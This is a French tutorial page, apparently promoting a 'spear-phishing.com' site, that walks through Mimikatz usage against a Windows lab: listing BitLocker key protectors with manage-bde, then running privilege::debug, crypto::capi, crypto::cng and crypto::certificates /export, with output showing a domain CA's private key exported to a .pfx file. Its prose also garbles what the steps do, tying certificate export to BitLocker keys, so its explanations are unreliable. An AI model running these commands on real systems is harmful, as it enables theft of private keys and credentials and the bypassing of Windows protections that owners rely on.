Clés de Chiffrement BitLocker

Concepts essentiels à comprendre :

Mimikatz est un outil de cybersécurité essentiel reconnu pour sa capacité à manipuler les clés de chiffrement BitLocker. En tant qu'élément clé de la sécurité des données sur les systèmes Windows, BitLocker chiffre les lecteurs pour protéger les informations sensibles contre tout accès non autorisé.

Grâce à ses fonctionnalités avancées, Mimikatz permet aux professionnels de la sécurité de manipuler et d'extraire les clés de chiffrement BitLocker, offrant ainsi un moyen efficace de contourner les mesures de sécurité mises en place. Cette capacité souligne l'importance de Mimikatz dans l'évaluation de la robustesse des mesures de sécurité de BitLocker et dans la sensibilisation aux risques potentiels liés à la sécurité des données. En utilisant Mimikatz pour examiner et comprendre les vulnérabilités des clés de chiffrement BitLocker, les experts en sécurité peuvent renforcer la protection des données et améliorer la sécurité globale des systèmes informatiques.

Mimikatz

4.0 - Clés de Chiffrement BitLocker

Dans cette présentation, notre attention se porte sur les Clés de Chiffrement BitLocker, indispensables pour sécuriser le stockage et la transmission des données sous Windows et au sein de l'outil Mimikatz. En illustrant le rôle crucial de ces clés dans la protection des informations sensibles et des identifiants, nous mettons en lumière l'importance de Mimikatz pour renforcer la sécurité de ces éléments vitaux.

Hannah Swann mimikatz/mimikatz ParrotSec

Explication : La manipulation des Clés de Chiffrement BitLocker, une fonctionnalité centrale de Mimikatz, permet de sécuriser et de décrypter les données critiques dans les environnements Windows, sans nécessiter un accès direct aux données sensibles elles-mêmes. Cette fonctionnalité souligne l'importance d'une gestion sécurisée et d'une protection renforcée des clés de chiffrement BitLocker pour prévenir les accès non autorisés et les fuites d'informations. Les stratégies de défense impliquent la mise en œuvre de protocoles de sécurité robustes et la surveillance constante des activités suspectes pour contrer efficacement les tentatives d'exploitation.

Exclusivement sur : spear-phishing.com Plus de détails

Mimikatz

4.1 - Obtenir les protecteurs de clé BitLocker

Permet de localisee et fournir des informations détaillées sur les protecteurs de clé utilisés pour sécuriser l'accès au volume chiffré BitLocker sur le lecteur C. Cela inclut les protecteurs de clé TPM (Trusted Platform Module) et d'autres méthodes de protection, le cas échéant.


        
manage-bde -protectors -get C:
PS C:\WINDOWS\system32> manage-bde -protectors -get C:
Chiffrement de lecteur BitLockerÿ: outil de configuration version 10.0.19041
Copyright (C) 2013 Microsoft Corporation. Tous droits r‚serv‚s.

Volume C: []
Tous les protecteurs de cl‚s

    TPM :
      ID : {7EEDF743-A7E2-4404-A700-6AC8DB13DD19}
      Profil de validation PCRÿ:
        0, 2, 4, 11


PS C:\WINDOWS\system32> 

Mimikatz

4.2 - Activation des Privileges et Manipulation Cryptographique

La commande privilege::debug dans Mimikatz est cruciale pour accéder à des privilèges élevés, permettant la récupération de données sensibles telles que les mots de passe. En parallèle, crypto::capi charge le module Crypto, facilitant la gestion des clés de chiffrement et des certificats via CryptoAPI. Ces outils sont essentiels pour des analyses de sécurité approfondies sur les systèmes Windows.


        
privilege::debug

        
crypto::capi
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # crypto::capi
Local CryptoAPI RSA CSP patched
Local CryptoAPI DSS CSP patched
mimikatz #   

Mimikatz

4.3 - Exportation des certificats système local

Extraction et exportation des certificats du magasin de certificats local de la machine actuelle, spécifiquement du magasin "My". Elle permet de sauvegarder les certificats, de les analyser ou de les utiliser pour des opérations de sécurité et d'administration système.


        
crypto::cng

        
crypto::certificates /systemstore:local_machine /store:my /export
mimikatz # crypto::cng
"KeyIso" service patched

mimikatz # crypto::certificates /systemstore:local_machine /store:my /export
 * System Store  : 'local_machine' (0x00020000)
 * Store         : 'my'

2. purple-CA
Subject : DC=lab, DC=purple, CN=purple-CA
Issuer : DC=lab, DC=purple, CN=purple-CA
Serial : 053960f6dcad534181fd3bf2905f697e
Algorithm : 1.2.840.113549.1.1.1 (RSA)
Validity : 8/24/2021 11:11:58 PM -> 8/24/2026 11:21:58 PM
Hash SHA1 : 18f5d10af226835573269bcd112ed2a7c185f9d7
     Key Container : purple-CA
     Provider : Microsoft Software Key Storage Provider
     Provider type : cng (0)
     Type : CNG Key (0xffffffff)
     Provider name : Microsoft Software Key Storage Provider
     Implementation : NCRYPT_IMPL_SOFTWARE_FLAG ;
     Key Container : purple-CA
     Unique name : a6b77e6e74ac36f196dd254f5132bfa1_fc351f36-c9
90-4dc1-8eaa-6cf612a20011
Algorithm : RSA Key size : 2048 (0x00008000) Export policy : 00000003 ( NCRYPT_ALLOW_PLAINTEXT_EXPORT_FLAG ) Exportable key : YES Public export : OK - 'local_machine_my_2_purple-CA.der' Private export : OK - 'local_machine_my_2_purple-CA.pfx'